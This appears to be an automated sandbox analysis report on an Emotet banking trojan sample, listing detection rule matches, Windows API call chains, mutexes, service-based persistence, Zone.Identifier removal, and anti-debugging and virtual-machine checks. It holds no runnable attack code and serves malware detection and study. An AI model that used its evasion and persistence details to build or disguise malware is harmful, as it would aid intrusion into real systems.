          Source: 1.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 2.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
          Source: 1.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
          Source: 2.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 1.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 1.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet tc_detection_name = Emotet, author = ReversingLabs, tc_detection_factor = , tc_detection_type = Trojan
          Source: 0.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
          Source: 0.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 3.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
          Source: 3.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 3.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet tc_detection_name = Emotet, author = ReversingLabs, tc_detection_factor = , tc_detection_type = Trojan
          Source: 2.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
          Source: 2.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 2.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet tc_detection_name = Emotet, author = ReversingLabs, tc_detection_factor = , tc_detection_type = Trojan
          Source: 0.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
          Source: 0.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: 0.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet tc_detection_name = Emotet, author = ReversingLabs, tc_detection_factor = , tc_detection_type = Trojan
          Source: 3.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
          Source: 3.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
          Source: classification engineClassification label: mal92.bank.troj.evad.winEXE@6/0@0/8
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0041D7DD __EH_prolog3_GS,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,0_2_0041D7DD
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: OpenSCManagerW,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,1_2_023ED4C5
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: OpenSCManagerW,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,3_2_00E7D4C5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_02311943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_02311943
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0042B11B __EH_prolog3_GS,_memset,GetVersionExA,_malloc,_memset,CoInitializeEx,CoCreateInstance,0_2_0042B11B
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00402500 FindResourceA,WideCharToMultiByte,WideCharToMultiByte,0_2_00402500
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023ED4C5 OpenSCManagerW,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,1_2_023ED4C5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ID1A8F11D
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeMutant created: \BaseNamedObjects\Global\ID1A8F11D
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\MD1A8F11D
          Source: YF4dF4w2Cr.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: YF4dF4w2Cr.exeMetadefender: Detection: 41%
          Source: YF4dF4w2Cr.exeReversingLabs: Detection: 86%
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_0-44293
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
          Source: unknownProcess created: C:\Users\user\Desktop\YF4dF4w2Cr.exe 'C:\Users\user\Desktop\YF4dF4w2Cr.exe'
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess created: C:\Users\user\Desktop\YF4dF4w2Cr.exe --5c8d8ab7
          Source: unknownProcess created: C:\Windows\SysWOW64\fwdrrebrand.exe C:\Windows\SysWOW64\fwdrrebrand.exe
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess created: C:\Windows\SysWOW64\fwdrrebrand.exe --1cbc15eb
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess created: C:\Users\user\Desktop\YF4dF4w2Cr.exe --5c8d8ab7Jump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess created: C:\Windows\SysWOW64\fwdrrebrand.exe --1cbc15ebJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_CURSOR
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_BITMAP
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_ICON
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_MENU
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_DIALOG
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_STRING
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_ACCELERATOR
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_GROUP_ICON
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00442426 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00442426
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0043185D push ecx; ret 0_2_00431870
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00431B73 push ecx; ret 0_2_00431B86
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022FE932 pushad ; ret 0_2_022FE933
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022FE9EA pushad ; iretd 0_2_022FE9ED
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0043185D push ecx; ret 1_2_00431870
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00431B73 push ecx; ret 1_2_00431B86
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_022FE932 pushad ; ret 1_2_022FE933
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_022FE9EA pushad ; iretd 1_2_022FE9ED
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E4E9EA pushad ; iretd 2_2_00E4E9ED
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E4E932 pushad ; ret 2_2_00E4E933
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E4E9EA pushad ; iretd 3_2_00E4E9ED
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E4E932 pushad ; ret 3_2_00E4E933

          Persistence and Installation Behavior:

          barindex
          Drops executables to the windows directory (C:\Windows) and starts themShow sources
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeExecutable created and started: C:\Windows\SysWOW64\fwdrrebrand.exeJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exePE file moved: C:\Windows\SysWOW64\fwdrrebrand.exeJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023ED4C5 OpenSCManagerW,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,1_2_023ED4C5

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeFile opened: C:\Windows\SysWOW64\fwdrrebrand.exe:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0040C49C IsIconic,GetWindowPlacement,GetWindowRect,0_2_0040C49C
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00418BD1 GetParent,GetParent,IsIconic,GetParent,0_2_00418BD1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00409E32 IsWindowVisible,IsIconic,0_2_00409E32
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00427FD5 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,0_2_00427FD5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0040C49C IsIconic,GetWindowPlacement,GetWindowRect,1_2_0040C49C
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00418BD1 GetParent,GetParent,IsIconic,GetParent,1_2_00418BD1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00409E32 IsWindowVisible,IsIconic,1_2_00409E32
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00427FD5 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,1_2_00427FD5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Found evasive API chain (may stop execution after checking mutex)Show sources
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-44324
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,1_2_023ED229
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,3_2_00E7D229
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-43626
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeAPI coverage: 7.8 %
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeAPI coverage: 9.1 %
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0042E202 lstrlenA,FindFirstFileA,FindClose,0_2_0042E202
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00429112 __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,0_2_00429112
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0042E202 lstrlenA,FindFirstFileA,FindClose,1_2_0042E202
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00429112 __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,1_2_00429112
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeAPI call chain: ExitProcess graph end nodegraph_0-42560
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeAPI call chain: ExitProcess graph end nodegraph_1-42504
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeAPI call chain: ExitProcess graph end nodegraph_1-44244
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00430650 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00430650
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00442426 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00442426
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00401AF0 mov eax, dword ptr fs:[00000030h]0_2_00401AF0
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022F0467 mov eax, dword ptr fs:[00000030h]0_2_022F0467
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022F0C0C mov eax, dword ptr fs:[00000030h]0_2_022F0C0C
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022F1743 mov eax, dword ptr fs:[00000030h]0_2_022F1743
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_023112CD mov eax, dword ptr fs:[00000030h]0_2_023112CD
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_02311E04 mov eax, dword ptr fs:[00000030h]0_2_02311E04
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00401AF0 mov eax, dword ptr fs:[00000030h]1_2_00401AF0
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_022F0467 mov eax, dword ptr fs:[00000030h]1_2_022F0467
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_022F0C0C mov eax, dword ptr fs:[00000030h]1_2_022F0C0C
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_022F1743 mov eax, dword ptr fs:[00000030h]1_2_022F1743
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E12CD mov eax, dword ptr fs:[00000030h]1_2_023E12CD
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023E1E04 mov eax, dword ptr fs:[00000030h]1_2_023E1E04
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E40467 mov eax, dword ptr fs:[00000030h]2_2_00E40467
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E40C0C mov eax, dword ptr fs:[00000030h]2_2_00E40C0C
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E41743 mov eax, dword ptr fs:[00000030h]2_2_00E41743
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E512CD mov eax, dword ptr fs:[00000030h]2_2_00E512CD
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E51E04 mov eax, dword ptr fs:[00000030h]2_2_00E51E04
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E40467 mov eax, dword ptr fs:[00000030h]3_2_00E40467
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E40C0C mov eax, dword ptr fs:[00000030h]3_2_00E40C0C
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E41743 mov eax, dword ptr fs:[00000030h]3_2_00E41743
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E712CD mov eax, dword ptr fs:[00000030h]3_2_00E712CD
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E71E04 mov eax, dword ptr fs:[00000030h]3_2_00E71E04
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_023114F2 GetProcessHeap,RtlAllocateHeap,0_2_023114F2
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00430650 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00430650
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_004366C1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004366C1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0043B152 SetUnhandledExceptionFilter,0_2_0043B152
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0043BF7D __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043BF7D
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00430650 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00430650
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_004366C1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004366C1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0043B152 SetUnhandledExceptionFilter,1_2_0043B152
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0043BF7D __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043BF7D
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022FD587 cpuid 0_2_022FD587
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_004420D1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,0_2_0043C0B5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_004421F9
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00442192
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,0_2_00442235
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,0_2_004429C1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,0_2_0044298D
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00442B00
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00440CFD
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,0_2_00415026
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,0_2_0044136B
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,0_2_004415C3
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,0_2_00441889
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoA,0_2_00443A6E
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,0_2_00441CDC
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_00441DF3
